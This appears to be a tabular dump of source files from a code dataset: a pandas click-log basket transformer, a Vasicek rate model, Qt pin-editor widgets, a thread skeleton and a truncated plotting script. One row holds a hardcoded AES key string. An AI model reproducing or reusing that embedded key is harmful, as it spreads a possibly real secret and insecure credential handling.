index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
7,900 | 3b61d389eda85ddb4c96f93c977a33b91da579ce | import numpy as np
import pandas as pd
# --- Input -----------------------------------------------------------------
INPUT_FILE = 'data_full.csv'

data = pd.read_csv(INPUT_FILE)
data['date'] = pd.to_datetime(data['date'], format='%d-%m-%Y %H:%M:%S')

# Collapse the click log to one row per user: <USER> [<SITES>]
data = data[['ip', 'address']]
# Selecting the 'address' column before transform yields a Series; the
# original two-column groupby().transform produced a one-column DataFrame.
data['sites'] = data.groupby('ip')['address'].transform(lambda x: ','.join(x))
data = data[['ip', 'sites']]
data['sites'] = data['sites'].apply(lambda x: x.split(','))
# Every row of a user already carries the full joined site list, so keeping
# the first occurrence per ip loses nothing.
data.drop_duplicates(subset='ip', inplace=True, keep='first')
data.reset_index(drop=True, inplace=True)

# --- Basket analysis -------------------------------------------------------
INPUT_FILE_MOST_POPULAR_SITES = 'percent_of_occurrences.csv'
sites = np.array(pd.read_csv(INPUT_FILE_MOST_POPULAR_SITES, usecols=[0]).values.tolist()).flatten()
cols = ['userID']
cols.extend(sites)
attributes = pd.DataFrame(columns=cols)
attributes['userID'] = data.ip
attributes.set_index('userID', inplace=True)

# --- Basket transformation: one 0/1 attribute per popular site -------------
for col in cols:
    if col == 'userID':
        continue
    attributes[col] = 0
site_set = set(sites)  # O(1) membership instead of scanning the ndarray
for i, row in data.iterrows():
    for site in row.sites:
        if site in site_set:
            # Bug fix: .loc writes into the frame itself; the original
            # chained `attributes.iloc[i][site] = 1` assigned into a
            # temporary copy and could silently drop the update.
            attributes.loc[row.ip, site] = 1

attributes.to_csv('user_attributes.arff', header=False)

# Prepend the ARFF header to the CSV body written above.
header = '@RELATION user_attributes.arff\n\n' + \
         '@ATTRIBUTE userID STRING\n'
for site in sites:
    header += '@ATTRIBUTE ' + site + ' {0, 1}\n'
header += '\n\n@DATA\n'
with open('user_attributes.arff', 'r+') as f:
    content = f.read()
    f.seek(0, 0)
    f.write(header.rstrip('\r') + '\n' + content)
|
7,901 | 7112348631bc60767bfb79c7f6966fc9189c522b | aes_key = 'eR5ceExL4IpUUY2lqALN7gLXzo11jlXPOwTwFGwOO3h='
|
7,902 | b6470ffda9040223951a99abc600ce1e99fe146b | from functions2 import *
import numpy as np
#from functions import TermStructure,load_data
import numpy as np
import math
from scipy import optimize
import pylab as pl
from IPython import display as dp
class Vasicek():
    """Vasicek short-rate model calibrated to an observed rate curve.

    Parameters
    ----------
    rs : pandas.DataFrame
        Rate observations; columns are maturities. Only the last row
        (most recent curve) is used for calibration.
    vol : scalar or sequence
        Volatility estimate(s), per maturity when a sequence.
    """

    def __init__(self, rs, vol):
        self.t = rs.columns      # maturities
        self.ps = rs[-1:]        # most recent observed curve
        self.sigma = vol

    def get_TheoreticalP(self, x=0):
        """Return model zero rates for maturities *x*.

        If *x* is not array-like (no ``.shape``), the maturities stored at
        construction time are used. Requires self.a / self.b to be set
        beforehand (by loss()/solve()).
        """
        sigma = self.sigma
        try:
            _ = x.shape
        except AttributeError:   # scalar sentinel -> fall back to stored maturities
            x = self.t
        a = self.a
        b = self.b
        # Affine term-structure coefficients of the Vasicek model.
        B = (1 - np.exp(-a * x)) / a
        A = np.exp(((B - x) * (a ** 2 * b - (sigma ** 2) / 2)) / a ** 2
                   - (sigma ** 2 * B ** 2) / (4 * a))
        self.B = B
        self.A = A
        self.sim_p = A * np.exp(-B * x)
        self.r = -1 * np.log(self.sim_p) / x
        return self.r

    def loss(self, x):
        """Scaled squared error between observed and model rates; x = (a, b)."""
        self.a = x[0]
        self.b = x[1]
        # NOTE(review): `apply` is not a Python 3 builtin; presumably
        # re-exported by `functions2` -- confirm.
        self.sim_rs = apply(self.get_TheoreticalP, self.ps)
        # .values replaces the long-deprecated DataFrame.as_matrix().
        loss = np.array(self.ps.values) - np.array(self.sim_rs)
        loss = 10000 * np.sum(loss ** 2)
        return loss

    def solve(self, x0=None):
        """Calibrate (a, b) with scipy's simplex optimizer.

        Bug fix: the original default ``x0=np.random.rand(2)`` was evaluated
        once at class-definition time, so every call reused the same
        "random" start point; drawing inside the call restores per-call
        randomization.
        """
        if x0 is None:
            x0 = np.random.rand(2)
        self.opt_results = optimize.fmin(self.loss, x0=x0)
        self.a = self.opt_results[0]
        self.b = self.opt_results[1]
        print(self.opt_results)

    def get_price_rate(self, T, r):
        """Return (bond price, yield) for maturity index *T* and short rate *r*."""
        sigma = list(self.sigma)[T]
        T = self.t[T]
        a = self.a
        b = self.b
        B = (1 - np.exp(-a * T)) / a
        # Bug fix: the -sigma^2 B^2 / (4a) term belongs INSIDE the exponent,
        # matching get_TheoreticalP and the standard Vasicek A(t, T) formula;
        # the original subtracted it from the exponential's result.
        A = np.exp(((B - T) * (a ** 2 * b - (sigma ** 2) / 2)) / a ** 2
                   - (sigma ** 2 * B ** 2) / (4 * a))
        p = A * np.exp(-B * r)
        r = -1 * np.log(p) / T
        return p, r
def option_pricing(V, r, t, T, X):
    """Price a European call on a zero-coupon bond under Vasicek model *V*.

    :param V: calibrated Vasicek instance (uses V.a, V.sigma, V.t)
    :param r: rate DataFrame; the short rate is read from the last row, column *t*
    :param t: option expiration (must be a value present in V.t)
    :param T: bond maturity (must be a value present in V.t)
    :param X: strike price
    :return: call option price

    NOTE(review): `norm` is not defined in this file -- presumably
    scipy.stats.norm re-exported via `from functions2 import *`; confirm.
    """
    #print('Expiration: {}'.format(t))
    #print('Maturity: {}'.format(T))
    # Map each maturity to its positional index for get_price_rate().
    time_dict = dict(zip(V.t, np.arange(len(V.t))))
    r = r[-1:][t].item()
    P = V.get_price_rate(time_dict[T], r)   # (price, yield) at bond maturity
    p = V.get_price_rate(time_dict[t], r)   # (price, yield) at option expiry
    # Volatility of the forward bond price over the option's life.
    sigmap = V.sigma[t]*(1/V.a)*(1/np.sqrt(t))*(1-np.exp(-V.a*(T-t)))*np.sqrt((1-np.exp(-2*V.a*t))/(2*V.a))
    # Black-style formula on bond prices.
    d = (1/sigmap)*np.log(P[0]/(p[0]*X))+0.5*sigmap
    c = P[0]*norm.cdf(d)-X*p[0]*norm.cdf(d-sigmap)
    return c
7,903 | ab79e2f9584dbbb526c62bde882a1bc9874b56f9 | from threading import Thread, Lock
from utils import reloj
import random
class Imprimidor(Thread):
    """Money-printer worker thread (skeleton; all behaviour left to implement)."""

    def __init__(self, nombre, berlin, bolsa_dinero):
        super().__init__()
        pass

    def run(self):
        '''
        Imprimidor behaviour: prints money every 5 minutes; on each
        iteration it checks whether a money problem occurs (20% chance).
        '''
        pass

    def imprimir_dinero(self, dinero):
        '''
        Call this method to print money.
        ***Concurrency errors must be prevented here***
        :param dinero: amount of money to print
        :return:
        '''
        pass

    def problema_papel(self):
        '''
        20% probability of a paper problem.
        '''
        pass
|
7,904 | 023dc23a5e649c2fbbb45ff577dffa3b5d2aac64 | import weakref
from Qt import QtCore
from Qt import QtGui
from Qt.QtWidgets import QDoubleSpinBox
from Qt.QtWidgets import QSpinBox
from Qt.QtWidgets import QWidget
from Qt.QtWidgets import QSpacerItem
from Qt.QtWidgets import QPushButton
from Qt.QtWidgets import QComboBox
from Qt.QtWidgets import QLineEdit
from Qt.QtWidgets import QCheckBox
from Qt.QtWidgets import QGraphicsProxyWidget
from Qt.QtWidgets import QGridLayout
from Qt.QtWidgets import QHBoxLayout
from Qt.QtWidgets import QSizePolicy
from AGraphCommon import *
from AbstractGraph import PinBase
from ..Ui import FloatVector3InputWidget_ui
from ..Ui import FloatVector4InputWidget_ui
from ..Ui import Matrix33InputWidget_ui
from ..Ui import Matrix44InputWidget_ui
import pyrr
def _configDoubleSpinBox(sb):
    """Apply the shared float editing limits to a QDoubleSpinBox.

    Range, precision and step come from the AGraphCommon constants so every
    float editor in the UI behaves identically.
    """
    # The three setters are independent; order does not matter.
    sb.setDecimals(FLOAT_DECIMALS)
    sb.setSingleStep(FLOAT_SINGLE_STEP)
    sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
def _configIntSpinBox(sb):
    """Apply the shared integer range to a QSpinBox."""
    sb.setRange(INT_RANGE_MIN, INT_RANGE_MAX)
class InputWidgetRaw(QWidget):
    """
    This type of widget can be used as a base class for complex ui generated by designer
    """
    def __init__(self, parent=None, dataSetCallback=None, defaultValue=None, userStructClass=None, **kwds):
        super(InputWidgetRaw, self).__init__(parent=parent, **kwds)
        # value restored into the widget by onResetValue()
        self._defaultValue = defaultValue
        # function with signature void(object)
        # this will set data to pin
        self.dataSetCallback = dataSetCallback

    def onResetValue(self):
        """Push the stored default value back into the widget."""
        self.setWidgetValue(self._defaultValue)

    def setWidgetValue(self, value):
        '''to widget (override in subclasses)'''
        pass

    def widgetValueUpdated(self, value):
        '''from widget (override in subclasses)'''
        pass
class InputWidgetSingle(InputWidgetRaw):
    """
    This type of widget is used for a simple widgets like buttons, checkboxes etc.
    It consists of horizontal layout widget itself and reset button.
    """
    def __init__(self, parent=None, dataSetCallback=None, defaultValue=None, userStructClass=None, **kwds):
        super(InputWidgetSingle, self).__init__(parent=parent, dataSetCallback=dataSetCallback, defaultValue=defaultValue, userStructClass=userStructClass, **kwds)
        # from widget
        self.bWidgetSet = False
        # Layout is a single row: [stretch spacer][data widget][reset button].
        self.gridLayout = QGridLayout(self)
        self.gridLayout.setSpacing(1)
        self.gridLayout.setContentsMargins(0, 0, 0, 0)
        self.gridLayout.setObjectName("gridLayout")
        self.horizontalLayout = QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        spacerItem = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem)
        self.pbReset = QPushButton(self)
        self.pbReset.setMaximumSize(QtCore.QSize(25, 25))
        self.pbReset.setText("")
        self.pbReset.setObjectName("pbReset")
        self.pbReset.setIcon(QtGui.QIcon(":/icons/resources/reset.png"))
        self.horizontalLayout.addWidget(self.pbReset)
        self.pbReset.clicked.connect(self.onResetValue)
        self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
        # Insertion position used by setWidget(): the data widget goes
        # before the reset button.
        self._index = 0

    def setWidget(self, widget):
        """Insert the concrete data widget into the row (left of reset)."""
        self.horizontalLayout.insertWidget(self._index, widget)
class ExecInputWidget(InputWidgetSingle):
    """Push-button widget for exec pins: clicking fires the pin directly."""
    def __init__(self, parent=None, **kwds):
        super(ExecInputWidget, self).__init__(parent=parent, **kwds)
        self.pb = QPushButton('execute', self)
        self.setWidget(self.pb)
        # Exec pins carry no value, so the button triggers the callback itself.
        self.pb.clicked.connect(self.dataSetCallback)
        # There is no value to reset to; drop the inherited reset button.
        self.pbReset.deleteLater()

    def setObjectName(self, name):
        super(ExecInputWidget, self).setObjectName(name)
        # Show only the trailing component of the dotted pin name.
        self.pb.setText(name.split(".")[-1])
class EnumInputWidget(InputWidgetSingle):
    """
    Enum input widget
    """
    def __init__(self, parent=None, **kwds):
        super(EnumInputWidget, self).__init__(parent=parent, **kwds)
        # self._userStruct = kwds['userStructClass']
        self.cb = QComboBox(self)
        self.setWidget(self.cb)
        # One combo entry per enum member; userData carries the member value.
        for i in list(kwds['userStructClass']):
            self.cb.addItem(i.name, i.value)
        # The pin receives the combo INDEX, not the enum value.
        self.cb.currentIndexChanged[int].connect(self.dataSetCallback)

    def setWidgetValue(self, val):
        """*val* is interpreted as a combo-box index."""
        self.cb.setCurrentIndex(val)
class FloatInputWidget(InputWidgetSingle):
    """Spin-box editor for floating point pin values."""

    def __init__(self, parent=None, **kwds):
        super(FloatInputWidget, self).__init__(parent=parent, **kwds)
        spinBox = QDoubleSpinBox(self)
        _configDoubleSpinBox(spinBox)
        self.sb = spinBox
        self.setWidget(spinBox)
        # Forward every user edit straight to the pin setter.
        self.sb.valueChanged.connect(lambda newValue: self.dataSetCallback(newValue))

    def setWidgetValue(self, val):
        """Write *val* into the spin box, coercing to float."""
        self.sb.setValue(float(val))
class IntInputWidget(InputWidgetSingle):
    """Spin-box editor for integer pin values."""

    def __init__(self, parent=None, **kwds):
        super(IntInputWidget, self).__init__(parent=parent, **kwds)
        spinBox = QSpinBox(self)
        _configIntSpinBox(spinBox)
        self.sb = spinBox
        self.setWidget(spinBox)
        # Forward every user edit straight to the pin setter.
        self.sb.valueChanged.connect(lambda newValue: self.dataSetCallback(newValue))

    def setWidgetValue(self, val):
        """Write *val* into the spin box, coercing to int."""
        self.sb.setValue(int(val))
class NoneInputWidget(InputWidgetSingle):
    """
    Read-only fallback widget for untyped/unknown pins (disabled line edit).
    """
    def __init__(self, parent=None, **kwds):
        super(NoneInputWidget, self).__init__(parent=parent, **kwds)
        self.le = QLineEdit(self)
        self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
        self.setWidget(self.le)
        self.le.textChanged.connect(lambda val: self.dataSetCallback(val))
        # Display only: the user cannot edit an untyped value.
        self.le.setEnabled(False)

    def setWidgetValue(self, val):
        self.le.setText(str(val))
class StringInputWidget(InputWidgetSingle):
    """
    String data input widget
    """
    def __init__(self, parent=None, **kwds):
        super(StringInputWidget, self).__init__(parent=parent, **kwds)
        self.le = QLineEdit(self)
        # Disable right-click menu so the graph context menu is not shadowed.
        self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
        self.setWidget(self.le)
        # Push every keystroke to the pin setter.
        self.le.textChanged.connect(lambda val: self.dataSetCallback(val))

    def setWidgetValue(self, val):
        self.le.setText(str(val))
class BoolInputWidget(InputWidgetSingle):
    """Check-box editor for boolean pin values."""

    def __init__(self, parent=None, **kwds):
        super(BoolInputWidget, self).__init__(parent=parent, **kwds)
        self.cb = QCheckBox(self)
        self.setWidget(self.cb)
        # Qt reports the state as an int; hand the pin a proper bool.
        self.cb.stateChanged.connect(lambda state: self.dataSetCallback(bool(state)))

    def setWidgetValue(self, val):
        """Check or uncheck the box according to the truthiness of *val*."""
        state = QtCore.Qt.Checked if bool(val) else QtCore.Qt.Unchecked
        self.cb.setCheckState(state)
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.Ui_Form):
    """Vector3 data input widget"""
    def __init__(self, **kwds):
        super(FloatVector3InputWidget, self).__init__(**kwds)
        self.setupUi(self)  # designer form: creates dsbX/dsbY/dsbZ and pbReset
        self._configSpinBoxes()
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Assemble the current spin-box values into a pyrr.Vector3."""
        return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value()])

    def _configSpinBoxes(self):
        # Same float limits as _configDoubleSpinBox, applied per component.
        self.dsbX.setDecimals(FLOAT_DECIMALS)
        self.dsbY.setDecimals(FLOAT_DECIMALS)
        self.dsbZ.setDecimals(FLOAT_DECIMALS)
        self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
        self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
        self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
        self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
        self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
        self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)

    # _onDataChangedX/Y/Z: rebuild the vector from the UI, overwrite the
    # edited component, then push the whole value to the pin.
    def _onDataChangedX(self, val):
        v = self.asDataTypeClass()
        v.x = val
        self.dataSetCallback(v)

    def _onDataChangedY(self, val):
        v = self.asDataTypeClass()
        v.y = val
        self.dataSetCallback(v)

    def _onDataChangedZ(self, val):
        v = self.asDataTypeClass()
        v.z = val
        self.dataSetCallback(v)

    def setWidgetValue(self, val):
        """Copy *val* (pyrr.Vector3-like) component-wise into the spin boxes."""
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.Ui_Form):
    """Vector4 data input widget"""
    def __init__(self, **kwds):
        super(FloatVector4InputWidget, self).__init__(**kwds)
        self.setupUi(self)  # designer form: creates dsbX/dsbY/dsbZ/dsbW and pbReset
        self._configSpinBoxes()
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.dsbW.valueChanged.connect(self._onDataChangedW)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Assemble the current spin-box values into a pyrr.Vector4."""
        return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value(), self.dsbW.value()])

    def _configSpinBoxes(self):
        # Same float limits as _configDoubleSpinBox, applied per component.
        self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
        self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
        self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
        self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
        self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
        self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
        self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
        self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)
        self.dsbX.setDecimals(FLOAT_DECIMALS)
        self.dsbY.setDecimals(FLOAT_DECIMALS)
        self.dsbZ.setDecimals(FLOAT_DECIMALS)
        self.dsbW.setDecimals(FLOAT_DECIMALS)

    # _onDataChangedX/Y/Z/W: rebuild the vector from the UI, overwrite the
    # edited component, then push the whole value to the pin.
    def _onDataChangedX(self, val):
        v = self.asDataTypeClass()
        v.x = val
        self.dataSetCallback(v)

    def _onDataChangedY(self, val):
        v = self.asDataTypeClass()
        v.y = val
        self.dataSetCallback(v)

    def _onDataChangedZ(self, val):
        v = self.asDataTypeClass()
        v.z = val
        self.dataSetCallback(v)

    def _onDataChangedW(self, val):
        v = self.asDataTypeClass()
        v.w = val
        self.dataSetCallback(v)

    def setWidgetValue(self, val):
        """Copy *val* (pyrr.Vector4-like) component-wise into the spin boxes."""
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
        self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
    """Quaternion data input widget"""
    def __init__(self, **kwds):
        super(QuatInputWidget, self).__init__(**kwds)

    def asDataTypeClass(self):
        # Reuses the 4 spin boxes of the vector widget, packed as x, y, z, w.
        return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value(), self.dsbW.value()])
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
    """Matrix33 data input widget"""
    def __init__(self, parent=None, **kwds):
        super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)  # designer form: dsbm11..dsbm33 spin boxes + pbReset
        self._configSpinBoxes()
        self.dsbm11.valueChanged.connect(self.m11Changed)
        self.dsbm12.valueChanged.connect(self.m12Changed)
        self.dsbm13.valueChanged.connect(self.m13Changed)
        self.dsbm21.valueChanged.connect(self.m21Changed)
        self.dsbm22.valueChanged.connect(self.m22Changed)
        self.dsbm23.valueChanged.connect(self.m23Changed)
        self.dsbm31.valueChanged.connect(self.m31Changed)
        self.dsbm32.valueChanged.connect(self.m32Changed)
        self.dsbm33.valueChanged.connect(self.m33Changed)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Assemble the 9 spin-box values into a pyrr.Matrix33 (row-major)."""
        return pyrr.Matrix33([
            [self.dsbm11.value(), self.dsbm12.value(), self.dsbm13.value()],
            [self.dsbm21.value(), self.dsbm22.value(), self.dsbm23.value()],
            [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value()]
        ])

    def _configSpinBoxes(self):
        # Apply the shared float limits to every element editor.
        ls = [self.dsbm11, self.dsbm12, self.dsbm13,
              self.dsbm21, self.dsbm22, self.dsbm23,
              self.dsbm31, self.dsbm32, self.dsbm33]
        for sb in ls:
            sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            sb.setSingleStep(FLOAT_SINGLE_STEP)
            sb.setDecimals(FLOAT_DECIMALS)

    # Element slots: rebuild the matrix from the UI, overwrite the edited
    # element, then push the full matrix to the pin.
    def m11Changed(self, val):
        m = self.asDataTypeClass()
        m.m11 = val
        self.dataSetCallback(m)

    def m12Changed(self, val):
        m = self.asDataTypeClass()
        m.m12 = val
        self.dataSetCallback(m)

    def m13Changed(self, val):
        m = self.asDataTypeClass()
        m.m13 = val
        self.dataSetCallback(m)

    def m21Changed(self, val):
        m = self.asDataTypeClass()
        m.m21 = val
        self.dataSetCallback(m)

    def m22Changed(self, val):
        m = self.asDataTypeClass()
        m.m22 = val
        self.dataSetCallback(m)

    def m23Changed(self, val):
        m = self.asDataTypeClass()
        m.m23 = val
        self.dataSetCallback(m)

    def m31Changed(self, val):
        m = self.asDataTypeClass()
        m.m31 = val
        self.dataSetCallback(m)

    def m32Changed(self, val):
        m = self.asDataTypeClass()
        m.m32 = val
        self.dataSetCallback(m)

    def m33Changed(self, val):
        m = self.asDataTypeClass()
        m.m33 = val
        self.dataSetCallback(m)

    def setWidgetValue(self, val):
        """Copy *val* (pyrr.Matrix33-like) element-wise into the spin boxes."""
        self.dsbm11.setValue(val.m11)
        self.dsbm12.setValue(val.m12)
        self.dsbm13.setValue(val.m13)
        self.dsbm21.setValue(val.m21)
        self.dsbm22.setValue(val.m22)
        self.dsbm23.setValue(val.m23)
        self.dsbm31.setValue(val.m31)
        self.dsbm32.setValue(val.m32)
        self.dsbm33.setValue(val.m33)
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
    """Matrix44 data input widget"""
    def __init__(self, parent=None, **kwds):
        super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)  # designer form: dsbm11..dsbm44 spin boxes + pbReset
        self._configSpinBoxes()
        self.dsbm11.valueChanged.connect(self.m11Changed)
        self.dsbm12.valueChanged.connect(self.m12Changed)
        self.dsbm13.valueChanged.connect(self.m13Changed)
        self.dsbm14.valueChanged.connect(self.m14Changed)
        self.dsbm21.valueChanged.connect(self.m21Changed)
        self.dsbm22.valueChanged.connect(self.m22Changed)
        self.dsbm23.valueChanged.connect(self.m23Changed)
        self.dsbm24.valueChanged.connect(self.m24Changed)
        self.dsbm31.valueChanged.connect(self.m31Changed)
        self.dsbm32.valueChanged.connect(self.m32Changed)
        self.dsbm33.valueChanged.connect(self.m33Changed)
        self.dsbm34.valueChanged.connect(self.m34Changed)
        self.dsbm41.valueChanged.connect(self.m41Changed)
        self.dsbm42.valueChanged.connect(self.m42Changed)
        self.dsbm43.valueChanged.connect(self.m43Changed)
        self.dsbm44.valueChanged.connect(self.m44Changed)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Assemble the 16 spin-box values into a pyrr.Matrix44 (row-major)."""
        return pyrr.Matrix44([
            [self.dsbm11.value(), self.dsbm12.value(), self.dsbm13.value(), self.dsbm14.value()],
            [self.dsbm21.value(), self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],
            [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(), self.dsbm34.value()],
            [self.dsbm41.value(), self.dsbm42.value(), self.dsbm43.value(), self.dsbm44.value()]
        ])

    def _configSpinBoxes(self):
        # Apply the shared float limits to every element editor.
        ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14,
              self.dsbm21, self.dsbm22, self.dsbm23, self.dsbm24,
              self.dsbm31, self.dsbm32, self.dsbm33, self.dsbm34,
              self.dsbm41, self.dsbm42, self.dsbm43, self.dsbm44]
        for sb in ls:
            sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            sb.setSingleStep(FLOAT_SINGLE_STEP)
            sb.setDecimals(FLOAT_DECIMALS)

    # Element slots: rebuild the matrix from the UI, overwrite the edited
    # element, then push the full matrix to the pin.
    def m11Changed(self, val):
        m = self.asDataTypeClass()
        m.m11 = val
        self.dataSetCallback(m)

    def m12Changed(self, val):
        m = self.asDataTypeClass()
        m.m12 = val
        self.dataSetCallback(m)

    def m13Changed(self, val):
        m = self.asDataTypeClass()
        m.m13 = val
        self.dataSetCallback(m)

    def m14Changed(self, val):
        m = self.asDataTypeClass()
        m.m14 = val
        self.dataSetCallback(m)

    def m21Changed(self, val):
        m = self.asDataTypeClass()
        m.m21 = val
        self.dataSetCallback(m)

    def m22Changed(self, val):
        m = self.asDataTypeClass()
        m.m22 = val
        self.dataSetCallback(m)

    def m23Changed(self, val):
        m = self.asDataTypeClass()
        m.m23 = val
        self.dataSetCallback(m)

    def m24Changed(self, val):
        m = self.asDataTypeClass()
        m.m24 = val
        self.dataSetCallback(m)

    def m31Changed(self, val):
        m = self.asDataTypeClass()
        m.m31 = val
        self.dataSetCallback(m)

    def m32Changed(self, val):
        m = self.asDataTypeClass()
        m.m32 = val
        self.dataSetCallback(m)

    def m33Changed(self, val):
        m = self.asDataTypeClass()
        m.m33 = val
        self.dataSetCallback(m)

    def m34Changed(self, val):
        m = self.asDataTypeClass()
        m.m34 = val
        self.dataSetCallback(m)

    def m41Changed(self, val):
        m = self.asDataTypeClass()
        m.m41 = val
        self.dataSetCallback(m)

    def m42Changed(self, val):
        m = self.asDataTypeClass()
        m.m42 = val
        self.dataSetCallback(m)

    def m43Changed(self, val):
        m = self.asDataTypeClass()
        m.m43 = val
        self.dataSetCallback(m)

    def m44Changed(self, val):
        m = self.asDataTypeClass()
        m.m44 = val
        self.dataSetCallback(m)

    def setWidgetValue(self, val):
        """Copy *val* (pyrr.Matrix44-like) element-wise into the spin boxes."""
        self.dsbm11.setValue(val.m11)
        self.dsbm12.setValue(val.m12)
        self.dsbm13.setValue(val.m13)
        self.dsbm14.setValue(val.m14)
        self.dsbm21.setValue(val.m21)
        self.dsbm22.setValue(val.m22)
        self.dsbm23.setValue(val.m23)
        self.dsbm24.setValue(val.m24)
        self.dsbm31.setValue(val.m31)
        self.dsbm32.setValue(val.m32)
        self.dsbm33.setValue(val.m33)
        self.dsbm34.setValue(val.m34)
        self.dsbm41.setValue(val.m41)
        self.dsbm42.setValue(val.m42)
        self.dsbm43.setValue(val.m43)
        self.dsbm44.setValue(val.m44)
def getInputWidget(dataType, dataSetter, defaultValue, userStructClass):
    '''
    factory method
    '''
    # Widgets constructed with just the setter and a default value.
    # NOTE: relies on DataTypes members being hashable (ints/enum members).
    simpleWidgets = {
        DataTypes.Float: FloatInputWidget,
        DataTypes.Int: IntInputWidget,
        DataTypes.String: StringInputWidget,
        DataTypes.Bool: BoolInputWidget,
        DataTypes.FloatVector3: FloatVector3InputWidget,
        DataTypes.FloatVector4: FloatVector4InputWidget,
        DataTypes.Quaternion: QuatInputWidget,
        DataTypes.Matrix33: Matrix33InputWidget,
        DataTypes.Matrix44: Matrix44InputWidget,
    }
    widgetClass = simpleWidgets.get(dataType)
    if widgetClass is not None:
        return widgetClass(dataSetCallback=dataSetter, defaultValue=defaultValue)
    if dataType == DataTypes.Exec:
        # Exec pins carry no meaningful default value.
        return ExecInputWidget(dataSetCallback=dataSetter, defaultValue=None)
    if dataType == DataTypes.Enum:
        return EnumInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue, userStructClass=userStructClass)
    # Fallback: disabled line edit for unknown data types.
    return NoneInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
|
7,905 | 9fdcaf65f070b7081afd327442dd20e3284c71eb | #!/usr/bin/env python
"""This script draws a boxplot of each atom contribution to the cavity."""
import sys
# Guard clauses for this Python 2 script (note the print-chevron syntax):
# bail out early with a readable message rather than a traceback.
if sys.version < "2.7":
    print >> sys.stderr, "ERROR: This script requires Python 2.7.x. "\
        "Please install it and try again."
    exit(1)
try:
    import matplotlib.pyplot as pyplot
    import numpy
except ImportError:
    print >> sys.stderr, "ERROR:",
    print >> sys.stderr, "This script requires matplotlib and numpy. "\
        "Please make sure you installed it and that "\
        "your PYTHONPATH is set adequately."
    exit(1)
def parse_args():
    """Parse the command-line options of the contribution-plotting script."""
    import argparse
    import os.path

    def isfile(path):
        """argparse type-checker: path must name an existing regular file."""
        if not os.path.exists(path):
            raise argparse.ArgumentTypeError("No such file: '{0}'".format(path))
        if not os.path.isfile(path):
            raise argparse.ArgumentTypeError("Not a valid file: '{0}'".format(path))
        return path

    def help_formatter(prog):
        # Widen the help column so long option strings stay on one line.
        return argparse.HelpFormatter(prog, max_help_position=50)

    parser = argparse.ArgumentParser(description=__doc__,
                                     formatter_class=help_formatter)
    parser.add_argument("filename", type=isfile,
                        help="contribution data file")
    parser.add_argument("-o", "--output",
                        help="output file name")
    parser.add_argument("-n", type=int, default=0,
                        help="show n greatest contributions")
    parser.add_argument("-s", "--stdev", action="store_true",
                        help="only plot standard deviations")
    parser.add_argument("-r", metavar="residue", nargs="+",
                        help="plot specific residues along time")
    return parser.parse_args()
def die(s):
    """Print an error message to stderr and abort (Python 2 print syntax)."""
    print >> sys.stderr, "ERROR:", s
    exit(1)
def show_usage():
    """Print a minimal usage line to stderr."""
    print >> sys.stderr, "usage: python " + sys.argv[0] + " <filename.dat>"
def read_contrib(fname):
    """Parse a contribution data file.

    Each line is: <residue-name> <ignored> <count> <count> ...
    Returns a list of (residue_name, [int counts]) tuples, in file order.
    """
    parsed = []
    with open(fname, "rt") as handle:
        for line in handle:
            fields = line.split()
